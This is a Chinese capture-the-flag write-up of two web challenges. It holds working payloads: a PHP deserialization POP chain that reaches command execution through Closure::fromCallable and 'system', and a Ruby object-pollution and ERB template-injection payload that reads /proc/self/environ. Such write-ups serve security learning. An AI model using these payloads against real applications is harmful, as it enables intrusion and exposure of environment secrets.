当前位置: 首页 > news >正文

2025 春秋杯夏季个人挑战赛 Web

文章目录

    • ez_pop
    • ez_ruby

ez_pop

<?php
error_reporting(0);
highlight_file(__FILE__);class class_A
{public $s;public $a;public function __toString(){echo "2 A <br>";$p = $this->a;return $this->s->$p;}
}class class_B
{public $c;public $d;function is_method($input){if (strpos($input, '::') === false) {return false;}[$class, $method] = explode('::', $input, 2);if (!class_exists($class, false)) {return false;}if (!method_exists($class, $method)) {return false;}try {$refMethod = new ReflectionMethod($class, $method);return $refMethod->isInternal();} catch (ReflectionException $e) {return false;}}function is_class($input){if (strpos($input, '::') !== false) {return $this->is_method($input);}if (!class_exists($input, false)) {return false;}try {return (new ReflectionClass($input))->isInternal();} catch (ReflectionException $e) {return false;}}public function __get($name){echo "2 B <br>";$a = $_POST['a'];$b = $_POST;$c = $this->c;$d = $this->d;if (isset($b['a'])) {unset($b['a']);}if ($this->is_class($a)){call_user_func($a, $b)($c)($d);}else{die("你真该请教一下oSthinggg哥哥了");}}
}class class_C
{public $c;public function __destruct(){echo "2 C <br>";echo $this->c;}
}if (isset($_GET['un'])) {$a = unserialize($_GET['un']);throw new Exception("noooooob!!!你真该请教一下万能的google哥哥了");
}

这个php的pop链很简单,主要是如何利用call_user_func($a, $b)($c)($d);进行rce

$a必须要是内置类或者内置类里面的静态方法,$b是删除了$a的POST数组,$c$d 可以任意控制

经过查找可以知道Closure里面的fromCallable可以调用函数执行命令

Closure::fromCallable("system")("whoami");

在这里插入图片描述

这样虽然会报错,但也可以执行命令

call_user_func('Closure::fromCallable', "system")('whoami')();

在这里插入图片描述

但因为$b是一个$_POST数组,这样传参上去无法执行,一直报错

然后就想到可以嵌套一下,再次调用Closure::fromCallable, 也就是这样

call_user_func('Closure::fromCallable', "Closure::fromCallable")('system')('whoami');

因为$b是一个数组嘛,不能直接把这个Closure::fromCallable整个当成字符串传进去,得分开传

<?php
//$b=$_POST;
$b[0]='Closure';
$b[1]='fromCallable';
$c='system';
$d='whoami';
var_dump($b);
call_user_func('Closure::fromCallable', $b)($c)($d);

所以最终构造的payload就是这样的
(POST里面的参数除了那个a就只能是0和1,如果是其他的字符或数字都会报错)

?un=O:7:"class_C":1:{s:1:"c";O:7:"class_A":2:{s:1:"s";O:7:"class_B":2:{s:1:"c";s:6:"system";s:1:"d";s:6:"whoami";}s:1:"a";s:1:"x";}POST:
a=Closure::fromCallable&0=Closure&1=fromCallable

ez_ruby

require "sinatra"
require "erb"
require "json"class Userattr_reader :name, :agedef initialize(name="oSthinggg", age=21)@name = name@age = ageenddef is_admin?if to_s == "true""a admin,good!give your fake flag! flag{RuBy3rB_1$_s3_1Z}"else"not admin,your "+@to_sendenddef ageif @age > 20"old"else"young"endenddef merge(original, additional, current_obj = original)additional.each do |key, value|if value.is_a?(Hash)next_obj = current_obj.respond_to?(key) ? current_obj.public_send(key) : Object.newcurrent_obj.singleton_class.attr_accessor(key) unless current_obj.respond_to?(key)current_obj.instance_variable_set("@#{key}", next_obj)merge(original, value, next_obj)elsecurrent_obj.singleton_class.attr_accessor(key) unless current_obj.respond_to?(key)current_obj.instance_variable_set("@#{key}", value)endendoriginalend
enduser = User.new("oSthinggg", 21)get "/" do  redirect "/set_age"
endget "/set_age" doERB.new(File.read("views/age.erb", encoding: "UTF-8")).result(binding)
endpost "/set_age" dorequest.body.rewindage = JSON.parse(request.body.read)user.merge(user,age)
endget "/view" do name=user.name().to_sop_age=user.age().to_sis_admin=user.is_admin?().to_sERB::new("<h1>Hello,oSthinggg!#{op_age} man!you #{is_admin} </h1>").result
end     

ruby的题目做的比较少,开始一直以为这道题是要类似于js里面的原型链污染,把to_s函数的返回值污染为true,拿到admin的身份就可以得到flag, 一直没成功,似乎只能改变@to_s变量的值,后面才知道是erb模板注入

直接污染@to_s变量的值执行命令,然后查看/view路由就行

{"to_s":"<%=`cat /proc/self/environ`%>"}
http://www.lryc.cn/news/587515.html

相关文章:

  • Spark SQL 之 UT
  • 实战:如何创建 AWS RDS 数据库
  • Android 16k jni修改
  • 构建高效事件驱动架构:AWS S3与SQS集成实践指南
  • 如何连接 AWS RDS 数据库实例
  • AWS RDS PostgreSQL可观测性最佳实践
  • 2025最新android面试指南
  • (三)OpenCV——图像形态学
  • 爬虫-爬取豆瓣top250
  • Android 16系统源码_窗口动画(一)窗口过渡动画层级图分析
  • Android编译系统——基础介绍(一)
  • LVS集群技术
  • 17.Python 中的相等性比较:== vs is
  • 云原生核心技术解析:Docker vs Kubernetes vs Docker Compose
  • 深入了解linux系统—— 进程信号的保存
  • 数据可视化全流程设计指南
  • Vue 低代码可视化表单设计器 FcDesigner v3.3 版本发布!表格布局升级+精细化权限控制
  • 前端常见十大问题讲解
  • Spark 之 like 表达式
  • SpringMVC4
  • UI前端与数字孪生结合实践探索:智慧物流的仓储自动化管理系统
  • pycharm恢复出厂设置,可以解决大多数pycharm存在的问题
  • 创建自定义Dataset类与多分类问题实战
  • 怎么解决数据库幻读问题
  • 【图片识别改名】水印相机拍的照片如何将照片的名字批量改为水印内容?图片识别改名的详细步骤和注意事项
  • 设计模式笔记_结构型_桥接模式
  • vscode 安装 esp ide环境
  • 基于MATLAB的LSTM长短期记忆神经网络的数据回归预测方法应用
  • 02 51单片机之LED闪烁
  • 前端同学,你能不能别再往后端传一个巨大的JSON了?